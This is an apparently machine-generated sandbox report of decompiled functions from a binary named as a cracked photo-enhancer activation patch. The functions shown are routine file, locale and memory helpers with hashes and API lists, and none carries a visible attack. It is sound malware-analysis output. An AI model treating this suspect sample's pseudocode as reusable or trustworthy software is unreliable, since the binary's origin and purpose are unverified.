Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: d48a79d8ee70c80f60c93aacfed67c0ad6e199761e735f170a71233113bd88e2
Instruction ID: a630936203178071a9ee71a4306d19d7bf0886e547c0eed2c6a3f5d1fd0b17c9
Opcode Fuzzy Hash: d48a79d8ee70c80f60c93aacfed67c0ad6e199761e735f170a71233113bd88e2
Instruction Fuzzy Hash: B9F08270A14704BEDB125F768C5282ABEACEB49B1475388B6F900A26D2E53C5820C569

Uniqueness

Uniqueness Score: -1.00%

Function 00407AE0 Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00407AE0(intOrPtr* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t7;
				intOrPtr* _t12;

				_push(__ecx);
				_t12 = __eax;
				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
					E00407940( *_t12);
				}
				return _v16;
			}

0x00407ae3
0x00407ae8
0x00407af7
0x00407afe
0x00407b12
0x00407b12
0x00407b1e

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407AF7
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407B06

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 5c17caa541fddce76649cc04805944c392fc8533b1365d2e374aefba6a6f009b
Instruction ID: e6678645df70ceda1296de0698669a3f17118b423087409050d1bdfb176b5629
Opcode Fuzzy Hash: 5c17caa541fddce76649cc04805944c392fc8533b1365d2e374aefba6a6f009b
Instruction Fuzzy Hash: 33E092B17081106AEB20A65E9884F6767ECCBC5368F04457BF608DB286D678EC008377

Uniqueness

Uniqueness Score: -1.00%

Function 00407B20 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407B20(intOrPtr* __eax, void* __edx) {
				long _v16;
				long _v20;
				long _t8;
				long _t9;
				intOrPtr* _t11;

				asm("movsd");
				asm("movsd");
				_t11 = __eax;
				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
				_t9 = _t8 + 1;
				if(_t9 == 0) {
					_t9 = GetLastError();
					if(_t9 != 0) {
						_t9 = E00407940( *_t11);
					}
				}
				return _t9;
			}

0x00407b2b
0x00407b2c
0x00407b2d
0x00407b3f
0x00407b44
0x00407b45
0x00407b47
0x00407b4e
0x00407b52
0x00407b52
0x00407b4e
0x00407b5c

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00407B3F
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407B47

Part of subcall function 00407940: GetLastError.KERNEL32(xz@,004079DE,?,?,021C03CC,?,0040AB73,00000001,00000000,00000002,00000000,0040B16A,?,00000000,0040B1A1), ref: 00407943

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 5d72a474d6866116df7c50e7d91214adeba9db5fc19ecb02cee2fd0cbf9ab777
Instruction ID: e41e806bfeb234626b87b501edff7cf6b7d3219fcc40cd55b05b53632260e4a9
Opcode Fuzzy Hash: 5d72a474d6866116df7c50e7d91214adeba9db5fc19ecb02cee2fd0cbf9ab777
Instruction Fuzzy Hash: BDE092767082005BD610E55EC881F9B33DCDFC5368F004137B658EB1D1DA75A8008366

Uniqueness

Uniqueness Score: -1.00%

Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407A78(intOrPtr* __eax, long* __edx) {
				long _t8;
				long* _t11;
				intOrPtr* _t13;

				_t11 = __edx;
				_t13 = __eax;
				 *(__edx + 4) = 0;
				_t8 = SetFilePointer( *(__eax + 4), 0, __edx + 4, 1); // executed
				 *_t11 = _t8;
				if( *_t11 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						return E00407940( *_t13);
					}
				}
				return _t8;
			}

0x00407a7a
0x00407a7c
0x00407a80
0x00407a8f
0x00407a94
0x00407a99
0x00407a9b
0x00407aa2
0x00000000
0x00407aa6
0x00407aa2
0x00407aad

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 00407A8F
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407A9B

Part of subcall function 00407940: GetLastError.KERNEL32(xz@,004079DE,?,?,021C03CC,?,0040AB73,00000001,00000000,00000002,00000000,0040B16A,?,00000000,0040B1A1), ref: 00407943

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 376b7221faa1d9c8226b04aa14be382687234a7c39477bd240d3c8d17531cd0a
Instruction ID: 5d7889b2766bb560f48239758183442fe2ff1acd2572488175a49b0c159bb46e
Opcode Fuzzy Hash: 376b7221faa1d9c8226b04aa14be382687234a7c39477bd240d3c8d17531cd0a
Instruction Fuzzy Hash: 57E04FB16002109FEB20EEB98981B5673D89F44364F048576E614DF2C6D378DC008B66

Uniqueness

Uniqueness Score: -1.00%

Function 00407BD6 Relevance: 1.8, APIs: 1, Instructions: 279fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00407B93

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: dc8f9862481319be3bdbd5661d3fcc7de93382422b7ff2ce1cd8379c78404356
Instruction ID: 1ffe8940fb0bba7a1c466ab1a63027f62bf18732910125c6c2e91df4c90979d7
Opcode Fuzzy Hash: dc8f9862481319be3bdbd5661d3fcc7de93382422b7ff2ce1cd8379c78404356
Instruction Fuzzy Hash: 7351B12084E2910FDB125B7459A85A13FA1FF5331532A52FBC4D2AB1E3D27CA847835F

Uniqueness

Uniqueness Score: -1.00%

Function 00405708 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00405708(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x40583e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x40d4c0;
				_t106 = 0x40d4f0;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E00405164(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E00405694(_v12, _v20, _t8 - 1,  &_v16); // executed
					E004031E8(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E00405164(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E00405694(_v12, _v20, _t15 - 1,  &_v16);
					E004031E8(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x40d520;
				_t107 = 0x40d53c;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E00405164(_t26,  &_v20);
					E00405694(_v12, _v20, _v8 + 0x31,  &_v16);
					E004031E8(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E00405164(_t33,  &_v20);
					E00405694(_v12, _v20, _v8 + 0x2a,  &_v16);
					E004031E8(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00405845);
				return E004031B8( &_v20, 2);
			}

0x00405713
0x00405716
0x0040571b
0x0040571c
0x00405721
0x00405724
0x0040572c
0x0040572f
0x00405734
0x00405739
0x0040573e
0x00405745
0x0040574b
0x00405753
0x0040575a
0x00405764
0x00405770
0x00405776
0x0040577e
0x00405785
0x0040578f
0x00405794
0x00405795
0x00405798
0x0040579b
0x004057a0
0x004057a5
0x004057aa
0x004057af
0x004057af
0x004057b7
0x004057ba
0x004057c4
0x004057ca
0x004057db
0x004057e5
0x004057f1
0x004057f7
0x00405808
0x00405812
0x00405817
0x00405818
0x0040581b
0x0040581e
0x00405825
0x00405828
0x0040582b
0x0040583d

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040583E), ref: 00405727

Part of subcall function 00405164: LoadStringA.USER32 ref: 00405181

Part of subcall function 00405694: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040D4C0,00000001,?,0040575F,?,00000000,0040583E), ref: 004056B2

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 9ba8296990a72112227324fa3ee9fcc0b1e9336ed56d3b895413b02212f8560e
Instruction ID: c7d7bdc64998b5a50f072f8a8ba779086e7d05f386a85bc6535a333606642bb6
Opcode Fuzzy Hash: 9ba8296990a72112227324fa3ee9fcc0b1e9336ed56d3b895413b02212f8560e
Instruction Fuzzy Hash: 05315075E00509ABCF00DF95C8819EEB379FF84304F548977E815BB285E739AE068B94

Uniqueness

Uniqueness Score: -1.00%

Function 00407A2A Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407A2A(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403414(__edx),  *0x0040C158,  *0x0040C164, 0,  *0x0040C174, 0x80, 0); // executed
				return _t20;
			}

0x00407a6c
0x00407a74

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407A6C

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d70932e6098281890bada4fb0cb49f00060c997d215399a4c6e17c77cbc25981
Instruction ID: 042ae40820150c0b4851109f40d588701a9899a67d40570aa5757512981d293a
Opcode Fuzzy Hash: d70932e6098281890bada4fb0cb49f00060c997d215399a4c6e17c77cbc25981
Instruction Fuzzy Hash: 6FE0ED753442586EE340DAED6D81FA677DC974A714F008132B998DB382D4719D118BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406E64 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00406E64(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x406eac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E00406E00(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesA(E00403414(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00406EB3);
				return E00403198( &_v8);
			}

0x00406e67
0x00406e70
0x00406e71
0x00406e76
0x00406e79
0x00406e81
0x00406e8f
0x00406e98
0x00406e9b
0x00406e9e
0x00406eab

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406EAC,?,?,?,?,00000000,?,00406EC1,0040721B,00000000,00407260,?,?,?), ref: 00406E8F

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 24e4b9a91e1daf3bf67ed32386f94fc4a36e54d9486d967fbff76b5f6006ff24
Instruction ID: 7ab40f028fd3c5f14a353e55118c7c81c89abefc65ec3810316971f178424404
Opcode Fuzzy Hash: 24e4b9a91e1daf3bf67ed32386f94fc4a36e54d9486d967fbff76b5f6006ff24
Instruction Fuzzy Hash: 21E06D35204704BFD701EEA2DD52A5ABBACDB89B04BA24476F501A6682D6796E1084A8

Uniqueness

Uniqueness Score: -1.00%

Function 00407A2C Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407A2C(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403414(__edx),  *0x0040C158,  *0x0040C164, 0,  *0x0040C174, 0x80, 0); // executed
				return _t20;
			}

0x00407a6c
0x00407a74

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407A6C

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9c11b2a4cf94016adbe46f41987ce67f399dd20175b5552a4b2bfc50b96cd780
Instruction ID: 8ced2eed2e357b00b36525f681a949bcf9e14530d7ff6951507f50c56b932d1f
Opcode Fuzzy Hash: 9c11b2a4cf94016adbe46f41987ce67f399dd20175b5552a4b2bfc50b96cd780
Instruction Fuzzy Hash: 95E0ED753442586EE240DAED6D81F96779C974A714F008122B998DB382D4719D118BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407B7C Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00407B93

Part of subcall function 00407940: GetLastError.KERNEL32(xz@,004079DE,?,?,021C03CC,?,0040AB73,00000001,00000000,00000002,00000000,0040B16A,?,00000000,0040B1A1), ref: 00407943

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: c995ec0617991e2e94a6585707192c72dfa586fe6c201feb7b9ef6767feef1e5
Instruction ID: 9cacba7c6654c632647ec303d4b17c56949909c1fcff6adca1bc3dcca5067dcb
Opcode Fuzzy Hash: c995ec0617991e2e94a6585707192c72dfa586fe6c201feb7b9ef6767feef1e5
Instruction Fuzzy Hash: 52E0ED726081106BEB10E65A9984E9777ECDFC5364F00407BB648DB241D578AC058676

Uniqueness

Uniqueness Score: -1.00%

Function 00407738 Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407738(long __eax, void* __edx) {
				char _v1028;
				long _t6;
				void* _t9;
				intOrPtr _t15;
				void* _t16;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v1028, 0x400, 0); // executed
				while(_t6 > 0) {
					_t15 =  *((intOrPtr*)(_t16 + _t6 - 1));
					if(_t15 <= 0x20) {
						L1:
						_t6 = _t6 - 1;
						__eflags = _t6;
						continue;
					} else {
						_t19 = _t15 - 0x2e;
						if(_t15 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00403278(_t9, _t6, _t16, _t19);
			}

0x0040773f
0x00407757
0x0040775f
0x00407763
0x0040776a
0x0040775e
0x0040775e
0x0040775e
0x00000000
0x0040776c
0x0040776c
0x0040776f
0x00000000
0x00000000
0x0040776f
0x00000000
0x0040776a
0x00407782

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004095FB,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 00407757

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: ae2211e31bb54872ca0cc89886dd4699aa21f9c9d48a8aafd9a4e38039cc465e
Instruction ID: 444c138c93f6580368b8f7bf76726c6abc5f79d38e46f5c5344eab39dd4d6646
Opcode Fuzzy Hash: ae2211e31bb54872ca0cc89886dd4699aa21f9c9d48a8aafd9a4e38039cc465e
Instruction Fuzzy Hash: 20E0D8A1B8830126F62426144C87F77110E43C0740F60403A7B04EF3D2D6FEB909429F

Uniqueness

Uniqueness Score: -1.00%

Function 00407B60 Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407B60(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00407940( *_t7);
				}
				return _t4;
			}

0x00407b61
0x00407b67
0x00407b6e
0x00000000
0x00407b72
0x00407b78

APIs

SetEndOfFile.KERNEL32(?,023F0004,0040AF31,00000000), ref: 00407B67

Part of subcall function 00407940: GetLastError.KERNEL32(xz@,004079DE,?,?,021C03CC,?,0040AB73,00000001,00000000,00000002,00000000,0040B16A,?,00000000,0040B1A1), ref: 00407943

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 1909adfb068d84a4c7c509a03c933fc32f464db51ef0452f103150ab7bc1f699
Instruction ID: 97af4fe43c66ae010506ec3d7cd84cb65660405db9abbaf149828d557edbb573
Opcode Fuzzy Hash: 1909adfb068d84a4c7c509a03c933fc32f464db51ef0452f103150ab7bc1f699
Instruction Fuzzy Hash: F3C04CB160410057DB00A6AE85C1E1672D85A4825830040B6B604DB257D678E8108719

Uniqueness

Uniqueness Score: -1.00%

Function 004074AF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004074AF() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E004074CD);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x004074b1
0x004074b4
0x004074b7
0x004074c0
0x004074c5

APIs

SetErrorMode.KERNEL32(?,004074CD), ref: 004074C0

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b2df83a3f7eadccbe6543f05c1e4b9f9d7ac47d1857bfd650161f3857d5c0035
Instruction ID: 2360f01ce0fe84dc83243c5f87e7f13f8f92df382308918f1fe84dd18a5cd7c9
Opcode Fuzzy Hash: b2df83a3f7eadccbe6543f05c1e4b9f9d7ac47d1857bfd650161f3857d5c0035
Instruction Fuzzy Hash: C8B09B76F1C2006DE705DAD5745153877D4D7C47103A14877F114D25C0D53C94108519

Uniqueness

Uniqueness Score: -1.00%

Function 004074CB Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004074CB() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}

0x004074c0
0x004074c5

APIs

SetErrorMode.KERNEL32(?,004074CD), ref: 004074C0

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: eeeb51977643a1c07891125f237145a2d5169de148269e7e0dcbc59e3a378873
Instruction ID: d86a438f0f99301b82867e6a10fbdb03c4267dfb17041a1f22e3924364c889c4
Opcode Fuzzy Hash: eeeb51977643a1c07891125f237145a2d5169de148269e7e0dcbc59e3a378873
Instruction Fuzzy Hash: 55A002A9D08104BACE10EAE58CD5A7D77A86A883047D048AA7215B2181C53DE911963B

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF8 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406DF8(char* __eax, char* __edx) {
				char* _t2;

				_t2 = CharPrevA(__eax, __edx); // executed
				return _t2;
			}

0x00406dfa
0x00406dff

APIs

CharPrevA.USER32(?,?,00406DF4,?,00406AD1,?,?,004095D4,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409616), ref: 00406DFA

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 1f54fb0d7342efd56636b4bf43ce0ada456b4309ba7930a48c32b3046dc9142d
Instruction ID: 95ac89871b9e49aa2ffc5daef894b278f4bc9d8aafa7dca88aae54a0e9e7edad
Opcode Fuzzy Hash: 1f54fb0d7342efd56636b4bf43ce0ada456b4309ba7930a48c32b3046dc9142d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004083C4 Relevance: 1.3, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004083C4(void* __eax) {
				char _v16;
				char _v20;
				void* _v28;
				void* _t29;
				void* _t32;
				void* _t40;
				void* _t50;
				long _t52;

				_t40 = __eax;
				if( *((intOrPtr*)(__eax + 4))() != 5) {
					E00408230(1);
				}
				E0040277C(_t40 + 0x10, 0x50);
				if(E00408F5C(_t40 + 0x10, 0x50,  &_v16,  &_v20, 5) != 0) {
					E00408230(3);
				}
				if(_v16 > 0x4000000) {
					E00408230(7);
				}
				_t52 = _v20 + _v16;
				if(_t52 !=  *(_t40 + 0x64)) {
					E0040836C(_t40);
					_t32 = VirtualAlloc(0, _t52, 0x1000, 4); // executed
					_t50 = _t32;
					 *(_t40 + 0x60) = _t50;
					if(_t50 == 0) {
						E00405D0C();
					}
					 *(_t40 + 0x64) = _t52;
				}
				_t29 = E00408FAC(_t40 + 0x10,  *(_t40 + 0x60) + _v20,  *(_t40 + 0x60));
				 *((char*)(_t40 + 0xd)) = 1;
				return _t29;
			}

0x004083ca
0x004083dc
0x004083e3
0x004083e3
0x004083f2
0x00408416
0x0040841d
0x0040841d
0x0040842a
0x00408431
0x00408431
0x0040843a
0x00408441
0x00408445
0x00408454
0x00408459
0x0040845b
0x00408460
0x00408462
0x00408462
0x00408467
0x00408467
0x00408477
0x0040847c
0x00408486

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00408454

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

